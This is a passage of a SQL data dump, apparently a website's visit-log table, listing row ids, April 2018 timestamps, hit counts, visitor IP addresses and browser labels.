'141.8.142.74','other'),(234264,1524078339,2,2,0,0,'195.10.210.49','chrome'),(234265,1524078636,1,1,0,0,'162.210.196.97','other'),(234266,1524078758,1,1,0,0,'178.92.143.14','chrome'),(234267,1524080077,1,1,0,0,'8.29.198.25','other'),(234268,1524080950,3,3,0,0,'193.176.251.163','chrome'),(234269,1524082061,1,1,0,0,'31.6.126.115','other'),(234271,1524082120,2,2,0,0,'193.176.251.163','chrome'),(234272,1524082558,1,1,0,0,'207.46.13.237','other'),(234273,1524082671,1,1,0,0,'217.69.133.10','other'),(234274,1524082981,1,1,0,0,'207.46.13.91','other'),(234275,1524083108,1,1,0,0,'69.30.205.218','other'),(234276,1524083166,1,1,0,0,'178.154.171.88','other'),(234277,1524083923,1,1,0,0,'141.8.142.74','other'),(234278,1524084907,1,1,0,0,'178.154.171.88','other'),(234279,1524086271,1,1,0,0,'216.244.66.237','other'),(234280,1524086568,1,1,0,0,'89.163.206.215','firefox'),(234281,1524086653,1,1,0,0,'80.252.155.198','firefox'),(234282,1524086681,1,1,0,0,'178.154.171.88','other'),(234283,1524086838,1,1,0,0,'207.46.13.237','other'),(234284,1524086982,1,1,0,0,'91.209.11.236','other'),(234285,1524088392,2,2,0,0,'216.244.66.237','other'),(234286,1524088420,1,1,0,0,'207.46.13.237','other'),(234287,1524089308,1,1,0,0,'141.8.142.74','other'),(234288,1524089738,1,0,1,0,'66.249.66.201',''),(234289,1524090239,1,0,1,0,'66.249.66.195',''),(234290,1524090915,1,1,0,0,'8.29.198.25','other'),(234291,1524091400,1,0,1,0,'66.249.66.156',''),(234292,1524091732,1,1,0,0,'217.69.133.15','other'),(234293,1524092819,1,1,0,0,'141.8.142.74','other'),(234294,1524093473,2,2,0,0,'136.243.73.76','other'),(234295,1524094108,1,1,0,0,'178.154.171.88','other'),(234296,1524094157,1,1,0,0,'217.69.133.59','other'),(234297,1524095331,1,1,0,0,'35.226.23.240','other'),(234298,1524095562,1,1,0,0,'217.69.133.246','other'),(234299,1524095691,1,1,0,0,'35.189.37.151','firefox'),(234300,1524095722,1,1,0,0,'141.8.142.74','other'),(234301,1524096536,1,1,0,0,'54.67.59.131','chrome'),(234302,1524096879,1,1,0,0,'35.226.23.240','other'),(234303,1524097487,1,0,1,0,'66.249.66.158',''),(234304,1524097803,1,1,0,0,'178.154.171.88','other'),(234305,1524098080,1,1,0,0,'157.55.39.251','other'),(234306,1524098258,2,2,0,0,'79.211.71.56','other'),(234307,1524098941,1,1,0,0,'216.244.66.237','other'),(234308,1524099679,1,1,0,0,'178.154.171.88','other'),(234309,1524100304,1,1,0,0,'207.46.13.91','other'),(234310,1524100672,2,2,0,0,'141.8.142.74','other'),(234311,1524100837,2,2,0,0,'178.151.245.174','other'),(234312,1524101160,1,0,1,0,'66.249.66.199',''),(234313,1524101750,1,1,0,0,'8.29.198.27','other'),(234314,1524102254,2,2,0,0,'141.8.142.74','other'),(234315,1524102784,1,1,0,0,'5.9.79.151','other'),(234316,1524103826,2,2,0,0,'178.154.171.88','other'),(234317,1524103934,1,1,0,0,'87.250.224.46','other'),(234318,1524104153,1,1,0,0,'217.69.133.234','other'),(234319,1524104303,1,0,1,0,'66.249.66.195',''),(234320,1524104625,1,1,0,0,'216.244.66.237','other'),(234321,1524105345,1,1,0,0,'141.8.142.74','other'),(234322,1524105571,1,1,0,0,'216.244.66.237','other'),(234323,1524105611,1,1,0,0,'80.252.154.233','chrome'),(234324,1524106573,1,1,0,0,'46.161.9.30','firefox'),(234325,1524107146,1,1,0,0,'217.69.133.237','other'),(234326,1524107154,2,2,0,0,'141.8.142.74','other'),(234327,1524107243,1,1,0,0,'180.76.15.163','other'),(234328,1524108992,1,1,0,0,'217.69.133.234','other'),(234329,1524109528,1,1,0,0,'141.8.142.74','other'),(234330,1524110560,1,1,0,0,'207.46.13.91','other'),(234331,1524111607,1,1,0,0,'157.55.39.251','other'),(234332,1524111832,3,3,0,0,'216.244.66.237','other'),(234333,1524112592,1,1,0,0,'8.29.198.27','other'),(234334,1524113564,1,1,0,0,'207.46.13.91','other'),(234335,1524114161,2,2,0,0,'130.180.219.232','chrome'),(234336,1524114401,2,0,2,0,'66.249.66.199',''),(234337,1524114522,1,1,0,0,'176.111.46.87','chrome'),(234338,1524114613,1,1,0,0,'207.46.13.91','other'),(234339,1524117263,1,1,0,0,'77.111.244.33','chrome'),(234340,1524117564,1,1,0,0,'178.154.171.88','other'),(234341,1524117657,2,2,0,0,'91.196.178.71','chrome'),(234342,1524117801,1,1,0,0,'141.8.142.74','other'),(234343,1524118046,1,1,0,0,'37.9.113.182','other'),(234344,1524118204,1,0,1,0,'66.249.66.195',''),(234345,1524118572,1,1,0,0,'46.188.29.95','msie'),(234346,1524118675,2,2,0,0,'91.196.178.83','chrome'),(234347,1524118996,1,1,0,0,'91.124.182.170','firefox'),(234348,1524119028,1,1,0,0,'178.154.171.88','other'),(234349,1524119035,1,0,1,0,'66.249.66.199',''),(234350,1524119127,1,0,1,0,'66.249.66.195',''),(234351,1524119128,1,1,0,0,'66.249.66.199','chrome'),(234352,1524119320,1,1,0,0,'95.133.199.144','opera'),(234353,1524119348,2,0,2,0,'66.249.66.156',''),(234354,1524119816,2,2,0,0,'141.8.142.74','other'),(234355,1524120037,1,0,1,0,'66.249.66.201',''),(234356,1524120507,1,1,0,0,'216.244.66.237','other'),(234357,1524121440,2,2,0,0,'130.180.219.213','chrome'),(234358,1524121925,1,1,0,0,'217.69.133.239','other'),(234359,1524122662,1,1,0,0,'66.249.66.157','chrome'),(234360,1524122988,1,1,0,0,'46.211.113.99','other'),(234361,1524123129,1,1,0,0,'95.132.21.144','firefox'),(234362,1524123442,1,1,0,0,'8.29.198.25','other'),(234363,1524124298,3,0,3,0,'66.249.66.199',''),(234364,1524124827,1,1,0,0,'37.9.113.182','other'),(234365,1524124841,1,1,0,0,'95.135.40.221','chrome'),(234366,1524125412,1,1,0,0,'141.8.142.74','other'),(234367,1524125479,1,1,0,0,'87.250.224.46','other'),(234368,1524125688,1,0,1,0,'66.249.66.201',''),(234369,1524126064,3,3,0,0,'91.196.178.169','chrome'),(234370,1524126640,1,1,0,0,'216.244.66.237','other'),(234371,1524126675,1,0,1,0,'66.249.66.201',''),(234372,1524126893,1,1,0,0,'91.124.182.170','firefox'),(234373,1524127329,5,5,0,0,'91.196.178.83','chrome'),(234374,1524127396,1,1,0,0,'91.196.178.97','chrome'),(234375,1524127771,1,1,0,0,'37.54.75.195','chrome'),(234376,1524127830,1,1,0,0,'91.124.182.170','firefox'),(234377,1524128756,1,1,0,0,'91.124.182.170','firefox'),(234378,1524128806,1,0,1,0,'66.249.66.199',''),(234379,1524129589,2,2,0,0,'91.196.178.83','chrome'),(234380,1524129599,1,0,1,0,'66.249.66.195',''),(234381,1524129625,1,1,0,0,'91.196.178.131','firefox'),(234382,1524129968,1,1,0,0,'176.110.61.66','chrome'),(234383,1524130012,1,1,0,0,'91.124.182.170','firefox'),(234384,1524130211,1,1,0,0,'207.46.13.103','other'),(234385,1524130319,2,2,0,0,'178.154.171.88','other'),(234386,1524131054,1,1,0,0,'91.196.178.162','chrome'),(234387,1524131176,1,1,0,0,'78.111.185.236','chrome'),(234388,1524131626,1,1,0,0,'91.124.182.170','firefox'),(234389,1524132351,1,1,0,0,'157.55.39.137','other'),(234390,1524132641,3,3,0,0,'91.196.177.46','chrome'),(234391,1524133048,1,1,0,0,'35.226.23.240','other'),(234392,1524133352,1,1,0,0,'216.244.66.237','other'),(234393,1524133383,1,1,0,0,'212.1.72.74','firefox'),(234394,1524133553,1,1,0,0,'91.196.178.131','chrome'),(234395,1524133732,1,1,0,0,'37.9.113.115','other'),(234396,1524133778,13,13,0,0,'23.237.4.26','other'),(234397,1524134284,1,1,0,0,'8.29.198.25','other'),(234398,1524134506,1,1,0,0,'193.106.30.99','firefox'),(234399,1524135001,2,2,0,0,'178.154.171.88','other'),(234400,1524135330,1,1,0,0,'91.196.178.4','chrome'),(234401,1524135357,1,1,0,0,'188.230.43.254','other'),(234402,1524135405,1,1,0,0,'178.92.171.192','chrome'),(234403,1524135533,1,0,1,0,'66.249.66.195',''),(234404,1524135672,82,82,0,0,'5.189.191.207','other'),(234405,1524135877,2,2,0,0,'178.94.173.182','chrome'),(234406,1524136136,1,1,0,0,'35.226.23.240','other'),(234407,1524136513,1,1,0,0,'46.211.5.131','other'),(234408,1524136582,1,1,0,0,'178.154.171.88','other'),(234409,1524137154,1,1,0,0,'216.244.66.237','other'),(234410,1524137173,1,0,1,0,'66.249.66.201',''),(234411,1524137781,1,1,0,0,'180.76.15.16','other'),(234412,1524138267,2,2,0,0,'91.196.178.166','chrome'),(234413,1524138758,1,1,0,0,'178.154.171.88','other'),(234414,1524139196,1,1,0,0,'157.55.39.247','other'),(234415,1524140323,1,1,0,0,'178.92.114.28','firefox'),(234416,1524140388,1,1,0,0,'8.29.198.46','other'),(234417,1524140393,1,1,0,0,'8.29.198.38','other'),(234418,1524140419,1,1,0,0,'192.162.114.5','firefox'),(234419,1524140592,1,1,0,0,'8.29.198.26','other'),(234420,1524140684,1,1,0,0,'95.133.199.144','opera'),(234421,1524140866,1,1,0,0,'178.154.171.88','other'),(234422,1524141001,1,1,0,0,'141.8.142.74','other'),(234423,1524141114,1,0,1,0,'66.249.66.195',''),(234424,1524141487,1,1,0,0,'95.132.21.144','firefox'),(234425,1524141980,1,0,1,0,'66.249.66.199',''),(234426,1524142620,2,2,0,0,'91.196.177.15','chrome'),(234427,1524142720,1,1,0,0,'178.154.171.88','other'),(234428,1524143476,2,2,0,0,'199.58.86.211','other'),(234429,1524143673,1,1,0,0,'178.94.26.229','chrome'),(234430,1524143727,2,2,0,0,'141.8.142.74','other'),(234431,1524144125,1,0,1,0,'66.249.66.195',''),(234432,1524145126,1,1,0,0,'8.29.198.25','other'),(234433,1524145295,1,1,0,0,'95.132.21.144','firefox'),(234434,1524145561,1,1,0,0,'141.8.142.74','other'),(234435,1524145814,1,1,0,0,'146.185.223.143','chrome'),(234436,1524146256,27,27,0,0,'158.69.23.126','other'),(234437,1524146812,1,1,0,0,'35.226.23.240','other'),(234438,1524146823,1,1,0,0,'216.244.66.237','other'),(234439,1524146859,1,1,0,0,'82.207.57.50','firefox'),(234440,1524147890,1,1,0,0,'81.177.224.42','firefox'),(234441,1524148172,2,2,0,0,'216.244.66.237','other'),(234442,1524148960,2,2,0,0,'91.196.178.165','chrome'),(234443,1524149097,1,1,0,0,'188.230.43.254','other'),(234444,1524149246,1,1,0,0,'157.55.39.137','other'),(234445,1524149506,1,1,0,0,'66.249.66.201','chrome'),(234446,1524149513,1,1,0,0,'178.154.171.88','other'),(234447,1524149572,1,1,0,0,'66.249.66.156','chrome'),(234448,1524149641,1,1,0,0,'195.10.210.70','chrome'),(234449,1524150328,1,1,0,0,'217.69.136.208','other'),(234450,1524150390,1,1,0,0,'194.187.218.146','chrome'),(234451,1524150652,1,0,1,0,'66.249.66.201',''),(234452,1524150785,1,1,0,0,'216.244.66.237','other'),(234453,1524150798,1,1,0,0,'178.154.171.88','other'),(234454,1524150799,3,3,0,0,'141.8.142.74','other'),(234455,1524151437,1,1,0,0,'8.29.198.27','other'),(234456,1524151495,1,1,0,0,'188.230.43.254','other'),(234457,1524151559,1,1,0,0,'91.196.178.68','chrome'),(234458,1524151640,1,1,0,0,'193.0.217.93','chrome'),(234459,1524151747,1,1,0,0,'216.244.66.237','other'),(234460,1524151918,1,1,0,0,'87.250.224.46','other'),(234461,1524151963,1,1,0,0,'91.196.178.92','firefox'),(234462,1524152778,2,2,0,0,'91.121.116.72','other'),(234463,1524152868,1,1,0,0,'37.9.113.110','other'),(234464,1524152990,2,2,0,0,'87.250.224.46','other'),(234465,1524153735,1,1,0,0,'216.244.66.237','other'),(234466,1524153900,1,1,0,0,'188.230.43.254','other'),(234467,1524154686,1,1,0,0,'185.175.95.251','chrome'),(234468,1524154980,1,1,0,0,'141.8.142.74','other'),(234469,1524155239,1,1,0,0,'216.244.66.237','other'),(234470,1524155979,1,1,0,0,'8.29.198.26','other'),(234471,1524156307,1,1,0,0,'188.230.43.254','other'),(234472,1524156458,1,1,0,0,'217.69.133.216','other'),(234473,1524156551,1,1,0,0,'216.244.66.237','other'),(234474,1524156847,1,0,1,0,'66.249.66.158',''),(234475,1524157179,1,1,0,0,'35.226.23.240','other'),(234476,1524157367,4,4,0,0,'37.54.114.62','chrome'),(234477,1524157674,2,0,2,0,'66.249.66.195',''),(234478,1524158010,2,2,0,0,'148.251.126.73','other'),(234479,1524158143,1,1,0,0,'216.244.66.237','other'),(234480,1524158697,1,1,0,0,'91.196.178.102','chrome'),(234481,1524158954,1,1,0,0,'35.226.23.240','other'),(234482,1524158991,1,1,0,0,'141.8.142.74','other'),(234483,1524159033,1,1,0,0,'157.55.39.251','other'),(234484,1524159048,1,1,0,0,'87.250.224.46','other'),(234485,1524159449,1,1,0,0,'91.203.115.5','chrome'),(234486,1524159476,2,2,0,0,'216.244.66.237','other'),(234487,1524159625,1,0,1,0,'66.249.66.195',''),(234488,1524160395,1,0,1,0,'66.249.66.199',''),(234489,1524160913,1,1,0,0,'37.53.228.210','firefox'),(234490,1524161195,1,0,1,0,'66.249.66.156',''),(234491,1524161568,2,0,2,0,'66.249.66.201',''),(234492,1524161663,1,1,0,0,'35.226.23.240','other'),(234493,1524161677,1,1,0,0,'66.249.66.195','chrome'),(234494,1524161742,1,1,0,0,'66.249.66.157','chrome'),(234495,1524162141,1,1,0,0,'157.55.39.247','other'),(234496,1524162263,1,1,0,0,'8.29.198.27','other'),(234497,1524162584,1,1,0,0,'216.244.66.237','other'),(234498,1524163137,1,0,1,0,'66.249.66.195',''),(234499,1524163144,1,0,1,0,'66.249.66.199',''),(234500,1524163781,1,1,0,0,'37.9.113.182','other'),(234501,1524164336,1,0,1,0,'66.249.66.199',''),(234502,1524165120,1,1,0,0,'141.8.142.74','other'),(234503,1524165235,1,1,0,0,'178.154.171.88','other'),(234504,1524166034,1,1,0,0,'207.46.13.103','other'),(234505,1524166819,1,1,0,0,'8.29.198.25','other'),(234506,1524166922,1,0,1,0,'66.249.66.201',''),(234507,1524167311,2,2,0,0,'141.8.142.74','other'),(234508,1524167859,1,1,0,0,'157.55.39.247','other'),(234509,1524168122,1,0,1,0,'66.249.66.195',''),(234510,1524169506,1,1,0,0,'178.154.171.88','other'),(234511,1524169668,2,0,2,0,'66.249.66.201',''),(234512,1524169804,1,1,0,0,'216.244.66.237','other'),(234513,1524170511,1,0,1,0,'66.249.66.156',''),(234514,1524170552,1,1,0,0,'66.249.66.199','chrome'),(234515,1524170568,1,1,0,0,'66.249.66.157','chrome'),(234516,1524171305,2,2,0,0,'5.9.156.43','other'),(234517,1524171326,1,1,0,0,'157.55.39.137','other'),(234518,1524171528,2,2,0,0,'141.8.142.74','other'),(234519,1524171893,1,1,0,0,'207.46.13.103','other'),(234520,1524172119,1,1,0,0,'178.154.171.88','other'),(234521,1524172226,1,1,0,0,'37.9.113.182','other'),(234522,1524172797,1,1,0,0,'95.133.28.10','chrome'),(234523,1524173061,1,0,1,0,'66.249.66.201',''),(234524,1524173092,1,1,0,0,'8.29.198.27','other'),(234525,1524173914,1,1,0,0,'37.9.113.182','other'),(234526,1524175341,1,1,0,0,'217.69.133.236','other'),(234527,1524175408,1,1,0,0,'157.55.39.247','other'),(234528,1524175556,1,0,1,0,'66.249.66.201',''),(234529,1524175575,1,1,0,0,'141.8.142.74','other'),(234530,1524175604,1,1,0,0,'178.154.171.88','other'),(234531,1524176505,1,1,0,0,'178.154.171.88','other'),(234532,1524176770,2,2,0,0,'173.208.200.154','other'),(234533,1524177015,1,1,0,0,'217.69.133.11','other'),(234534,1524177653,1,1,0,0,'141.8.142.74','other'),(234535,1524177665,1,1,0,0,'8.29.198.26','other'),(234536,1524177686,2,2,0,0,'178.154.171.88','other'),(234537,1524177835,1,1,0,0,'66.249.66.199','chrome'),(234538,1524177926,2,0,2,0,'66.249.66.201',''),(234539,1524179145,1,1,0,0,'178.154.171.88','other'),(234540,1524179986,1,1,0,0,'87.250.224.46','other'),(234541,1524180177,1,1,0,0,'216.244.66.237','other'),(234542,1524180323,1,1,0,0,'217.69.133.225','other'),(234543,1524180495,2,0,2,0,'66.249.64.153',''),(234544,1524180512,1,1,0,0,'66.249.64.30','chrome'),(234545,1524180520,1,1,0,0,'66.249.64.155','chrome'),(234546,1524180687,1,1,0,0,'5.45.207.83','other'),(234547,1524181809,1,1,0,0,'216.244.66.237','other'),(234548,1524182332,1,1,0,0,'178.154.171.88','other'),(234549,1524182781,1,1,0,0,'216.244.66.237','other'),(234550,1524183253,1,1,0,0,'180.76.15.23','other'),(234551,1524183764,1,1,0,0,'157.55.39.137','other'),(234552,1524183819,1,0,1,0,'66.249.64.28',''),(234553,1524183925,1,1,0,0,'8.29.198.26','other'),(234554,1524183984,1,1,0,0,'144.217.66.151','other'),(234555,1524184034,1,1,0,0,'144.217.66.151','chrome'),(234556,1524184382,1,1,0,0,'216.244.66.237','other'),(234557,1524184398,1,1,0,0,'141.8.142.74','other'),(234558,1524185627,3,3,0,0,'141.8.142.74','other'),(234559,1524185730,1,1,0,0,'207.46.13.103','other'),(234560,1524185928,1,1,0,0,'178.154.171.88','other'),(234561,1524185961,1,1,0,0,'216.244.66.237','other'),(234562,1524187003,1,1,0,0,'54.165.59.7','other'),(234563,1524187182,1,1,0,0,'46.161.9.30','firefox'),(234564,1524187974,1,1,0,0,'178.154.171.88','other'),(234565,1524188504,1,1,0,0,'8.29.198.25','other'),(234566,1524188763,2,2,0,0,'141.8.142.74','other'),(234567,1524189566,1,1,0,0,'178.154.200.41','other'),(234568,1524190227,1,1,0,0,'141.8.142.74','other'),(234569,1524190568,1,1,0,0,'216.244.66.237','other'),(234570,1524191614,1,1,0,0,'216.244.66.237','other'),(234572,1524191697,1,1,0,0,'141.8.142.74','other'),(234573,1524191932,1,1,0,0,'157.55.39.247','other'),(234574,1524192258,1,1,0,0,'176.14.10.12','chrome'),(234575,1524192294,1,1,0,0,'178.154.171.88','other'),(234576,1524193046,1,1,0,0,'141.8.142.74','other'),(234577,1524193644,1,1,0,0,'37.9.113.182','other'),(234578,1524194760,1,1,0,0,'8.29.198.26','other'),(234579,1524194781,1,1,0,0,'141.8.142.74','other'),(234580,1524195574,1,1,0,0,'66.249.64.153','chrome'),(234581,1524197730,1,0,1,0,'66.249.64.28',''),(234582,1524198494,1,1,0,0,'217.69.133.12','other'),(234583,1524198951,1,1,0,0,'87.250.224.46','other'),(234584,1524199335,1,1,0,0,'8.29.198.27','other'),(234585,1524200373,1,1,0,0,'178.154.171.88','other'),(234586,1524201326,1,1,0,0,'176.111.46.87','chrome'),(234587,1524202304,1,1,0,0,'216.244.66.237','other'),(234588,1524202580,1,1,0,0,'95.132.57.90','chrome'),(234589,1524202808,1,1,0,0,'95.135.26.99','chrome'),(234590,1524203163,1,1,0,0,'37.9.113.157','other'),(234591,1524203742,1,1,0,0,'91.124.182.170','firefox'),(234592,1524204005,115,115,0,0,'5.9.60.241','other'),(234593,1524204285,1,1,0,0,'157.55.39.137','other'),(234594,1524204390,1,1,0,0,'157.55.39.251','other'),(234595,1524204411,1,1,0,0,'141.8.142.74','other'),(234596,1524204860,1,1,0,0,'91.124.182.170','firefox'),(234597,1524204867,1,1,0,0,'35.226.23.240','other'),(234598,1524205091,1,1,0,0,'216.244.66.237','other'),(234599,1524205118,1,1,0,0,'5.45.207.83','other'),(234600,1524205592,1,1,0,0,'8.29.198.25','other'),(234601,1524205784,1,1,0,0,'178.94.26.229','chrome'),(234602,1524205787,1,1,0,0,'37.9.113.157','other'),(234603,1524205873,1,1,0,0,'5.45.207.82','other'),(234604,1524205877,2,2,0,0,'178.62.234.153','chrome'),(234605,1524205966,2,0,2,0,'66.249.64.28',''),(234606,1524206489,1,1,0,0,'66.249.64.29','chrome'),(234607,1524206651,1,1,0,0,'207.46.13.103','other'),(234608,1524206803,4,4,0,0,'91.196.178.83','chrome'),(234609,1524206816,1,1,0,0,'178.154.171.88','other'),(234610,1524207714,1,1,0,0,'91.124.182.170','firefox'),(234611,1524207765,1,1,0,0,'91.196.177.46','firefox'),(234612,1524207844,1,1,0,0,'66.249.64.155','chrome'),(234613,1524208911,1,1,0,0,'195.191.169.55','chrome'),(234614,1524209114,2,2,0,0,'141.8.142.74','other'),(234615,1524210167,1,1,0,0,'8.29.198.27','other'),(234616,1524210732,1,1,0,0,'178.154.171.88','other'),(234617,1524210770,1,1,0,0,'95.132.33.88','firefox'),(234618,1524211259,2,2,0,0,'91.196.178.83','chrome'),(234619,1524211756,1,1,0,0,'91.124.182.170','firefox'),(234620,1524211854,2,2,0,0,'95.132.33.88','firefox'),(234621,1524211903,1,1,0,0,'212.113.43.58','opera'),(234622,1524211969,1,1,0,0,'157.55.39.247','other'),(234623,1524212081,1,1,0,0,'157.55.39.251','other'),(234624,1524212391,1,1,0,0,'216.244.66.237','other'),(234625,1524213649,1,1,0,0,'157.55.39.251','other'),(234626,1524214270,1,1,0,0,'91.124.182.170','firefox'),(234627,1524215035,1,1,0,0,'80.91.178.106','chrome'),(234628,1524215214,1,1,0,0,'91.196.178.97','chrome'),(234629,1524215268,1,1,0,0,'95.132.44.4','chrome'),(234630,1524215371,1,1,0,0,'180.76.15.148','other'),(234631,1524215399,2,2,0,0,'141.8.142.74','other'),(234632,1524215420,1,0,1,0,'66.249.64.30',''),(234633,1524215440,1,0,1,0,'66.249.64.29',''),(234634,1524215672,1,1,0,0,'66.249.64.30','chrome'),(234635,1524215728,1,1,0,0,'66.249.64.155','chrome'),(234636,1524216426,1,1,0,0,'8.29.198.25','other'),(234637,1524216587,2,2,0,0,'91.196.178.169','chrome'),(234638,1524217255,2,0,2,0,'66.249.64.28',''),(234639,1524217459,1,0,1,0,'66.249.64.29',''),(234640,1524217736,1,1,0,0,'178.154.171.88','other'),(234641,1524218481,1,1,0,0,'216.244.66.237','other'),(234642,1524219134,67,67,0,0,'5.189.160.96','other'),(234643,1524219487,38,38,0,0,'167.114.211.200','other'),(234644,1524219530,1,1,0,0,'37.55.56.190','chrome'),(234645,1524219626,1,1,0,0,'77.111.244.66','chrome'),(234646,1524219841,2,2,0,0,'91.196.178.165','chrome'),(234647,1524220004,2,2,0,0,'141.8.142.74','other'),(234648,1524220590,1,1,0,0,'157.55.39.113','other'),(234649,1524220977,2,2,0,0,'141.8.142.74','other'),(234650,1524221003,1,1,0,0,'8.29.198.27','other'),(234651,1524221232,1,1,0,0,'91.196.178.78','firefox'),(234652,1524222172,1,1,0,0,'95.133.152.161','chrome'),(234653,1524222572,1,1,0,0,'141.8.142.74','other'),(234654,1524222914,1,1,0,0,'178.154.171.88','other'),(234655,1524223080,1,1,0,0,'216.244.66.237','other'),(234656,1524223198,2,2,0,0,'91.196.178.83','chrome'),(234657,1524223794,2,2,0,0,'91.196.178.165','chrome'),(234658,1524223884,1,0,1,0,'66.249.64.28',''),(234659,1524224619,2,2,0,0,'91.196.178.171','chrome'),(234660,1524224649,1,1,0,0,'185.100.87.207','firefox'),(234661,1524224971,1,1,0,0,'54.208.102.37','other'),(234662,1524225205,1,1,0,0,'46.219.238.96','chrome'),(234663,1524225573,1,1,0,0,'141.8.142.74','other'),(234664,1524225627,1,1,0,0,'213.180.203.8','other'),(234665,1524226247,1,1,0,0,'212.1.126.82','chrome'),(234666,1524226717,7,7,0,0,'185.232.170.137','chrome'),(234667,1524226807,1,1,0,0,'141.8.142.74','other'),(234668,1524227259,1,1,0,0,'8.29.198.27','other'),(234669,1524227351,1,1,0,0,'95.215.94.94','chrome'),(234670,1524227963,1,1,0,0,'207.46.13.97','other'),(234671,1524228657,1,1,0,0,'217.69.133.13','other'),(234672,1524228731,1,1,0,0,'217.69.133.215','other'),(234673,1524228785,1,0,1,0,'66.249.64.28',''),(234674,1524228865,1,1,0,0,'91.209.11.236','other'),(234675,1524229952,1,1,0,0,'91.209.11.236','other'),(234676,1524230475,1,0,1,0,'66.249.64.29',''),(234677,1524230478,2,2,0,0,'162.210.196.100','other'),(234678,1524230761,1,0,1,0,'66.249.64.28',''),(234679,1524230799,2,1,1,0,'66.249.64.28',''),(234680,1524230804,1,1,0,0,'66.249.64.153','chrome'),(234681,1524230899,1,1,0,0,'216.244.66.237','other'),(234682,1524231014,1,1,0,0,'207.46.13.97','other'),(234683,1524231850,1,1,0,0,'8.29.198.27','other'),(234684,1524231913,2,2,0,0,'91.209.11.236','other'),(234685,1524232297,1,1,0,0,'185.83.215.22','firefox'),(234686,1524232377,1,1,0,0,'46.211.114.140','other'),(234687,1524232620,1,1,0,0,'178.154.171.88','other'),(234688,1524232698,1,1,0,0,'207.46.13.97','other'),(234689,1524232852,1,1,0,0,'178.154.200.41','other'),(234690,1524233413,3,3,0,0,'91.209.11.236','other'),(234691,1524233916,1,1,0,0,'193.239.238.4','chrome'),(234692,1524234066,1,1,0,0,'37.9.113.182','other'),(234693,1524234568,1,1,0,0,'178.154.200.41','other'),(234694,1524234685,1,1,0,0,'80.93.126.106','chrome'),(234695,1524234916,1,1,0,0,'217.182.252.214','other'),(234696,1524235143,1,1,0,0,'91.209.11.236','other'),(234697,1524235460,1,1,0,0,'87.250.224.46','other'),(234698,1524235608,2,2,0,0,'216.244.66.237','other'),(234699,1524236093,1,1,0,0,'188.230.43.254','other'),(234700,1524236204,1,1,0,0,'91.209.11.236','other'),(234701,1524236600,1,1,0,0,'207.46.13.52','other'),(234702,1524237376,1,0,1,0,'66.249.64.29',''),(234703,1524237604,1,0,1,0,'66.249.64.28',''),(234704,1524237709,1,1,0,0,'66.249.64.29','chrome'),(234705,1524237715,1,1,0,0,'66.249.64.157','chrome'),(234706,1524237848,1,1,0,0,'188.230.43.254','other'),(234707,1524237906,1,1,0,0,'91.209.11.236','other'),(234708,1524238105,1,1,0,0,'8.29.198.25','other'),(234709,1524238186,2,2,0,0,'144.76.12.66','other'),(234710,1524238294,2,2,0,0,'216.244.66.237','other'),(234711,1524239351,1,1,0,0,'178.154.171.88','other'),(234712,1524239687,1,1,0,0,'95.220.195.84','msie'),(234713,1524239697,1,1,0,0,'188.230.43.254','other'),(234714,1524240306,1,1,0,0,'141.8.142.74','other'),(234715,1524240551,1,1,0,0,'157.55.39.130','other'),(234716,1524241544,1,0,1,0,'66.249.64.153',''),(234717,1524241889,1,1,0,0,'91.209.11.236','other'),(234718,1524242089,1,1,0,0,'188.230.43.254','other'),(234719,1524242709,1,1,0,0,'8.29.198.25','other'),(234720,1524243632,1,1,0,0,'91.209.11.236','other'),(234721,1524243878,1,1,0,0,'141.8.142.74','other'),(234722,1524243942,1,1,0,0,'193.106.30.99','firefox'),(234723,1524244466,1,1,0,0,'93.79.133.231','chrome'),(234724,1524244560,1,1,0,0,'207.46.13.28','other'),(234725,1524245415,2,2,0,0,'91.209.11.236','other'),(234726,1524246195,2,2,0,0,'94.178.147.1','chrome'),(234727,1524246334,1,1,0,0,'107.167.104.130','other'),(234728,1524247124,1,1,0,0,'217.69.133.9','other'),(234729,1524247618,1,0,1,0,'66.249.64.30',''),(234730,1524247708,2,2,0,0,'91.209.11.236','other'),(234731,1524248084,1,1,0,0,'207.46.13.52','other'),(234732,1524248375,1,1,0,0,'146.185.223.143','firefox'),(234733,1524248938,1,1,0,0,'8.29.198.26','other'),(234734,1524249282,1,1,0,0,'35.226.23.240','other'),(234735,1524250262,1,1,0,0,'91.209.11.236','other'),(234736,1524250922,1,1,0,0,'37.9.113.182','other'),(234737,1524251827,1,1,0,0,'216.244.66.237','other'),(234738,1524251909,1,1,0,0,'207.46.13.28','other'),(234739,1524251980,1,0,1,0,'66.249.64.28',''),(234740,1524252170,1,0,1,0,'66.249.64.30',''),(234741,1524252625,1,1,0,0,'87.250.224.46','other'),(234742,1524253017,1,1,0,0,'217.69.133.216','other'),(234743,1524253181,1,1,0,0,'46.211.129.160','chrome'),(234744,1524253261,1,0,1,0,'66.249.64.29',''),(234745,1524253311,1,1,0,0,'216.244.66.237','other'),(234746,1524253551,1,1,0,0,'8.29.198.27','other'),(234747,1524253613,1,1,0,0,'91.196.178.51','chrome'),(234748,1524254068,1,1,0,0,'91.209.11.236','other'),(234749,1524255507,1,1,0,0,'217.69.133.225','other'),(234750,1524255833,1,1,0,0,'216.244.66.237','other'),(234751,1524257498,1,1,0,0,'216.244.66.237','other'),(234752,1524257819,2,2,0,0,'178.95.66.254','chrome'),(234753,1524258732,1,1,0,0,'178.154.200.41','other'),(234754,1524259433,1,1,0,0,'91.209.11.236','other'),(234755,1524259508,1,1,0,0,'35.226.23.240','other'),(234756,1524259520,1,1,0,0,'91.242.192.2','firefox'),(234757,1524259768,1,1,0,0,'8.29.198.27','other'),(234758,1524260866,1,1,0,0,'207.46.13.52','other'),(234759,1524261933,2,2,0,0,'91.209.11.236','other'),(234760,1524263113,1,1,0,0,'91.209.11.236','other'),(234761,1524263347,1,1,0,0,'216.244.66.237','other'),(234762,1524263570,1,1,0,0,'35.226.23.240','other'),(234763,1524264192,1,1,0,0,'91.209.11.236','other'),(234764,1524264385,1,1,0,0,'8.29.198.27','other'),(234765,1524264881,2,2,0,0,'148.251.7.6','other'),(234766,1524264933,1,1,0,0,'216.244.66.237','other'),(234767,1524265208,2,2,0,0,'91.209.11.236','other'),(234768,1524265780,2,2,0,0,'178.154.171.88','other'),(234769,1524266889,1,0,1,0,'66.249.64.29',''),(234770,1524267830,1,1,0,0,'216.244.66.237','other'),(234771,1524268715,2,2,0,0,'91.209.11.236','other'),(234772,1524269211,1,1,0,0,'141.8.142.74','other'),(234773,1524270506,1,1,0,0,'91.209.11.236','other'),(234774,1524270595,1,1,0,0,'8.29.198.25','other'),(234775,1524272998,2,2,0,0,'91.209.11.236',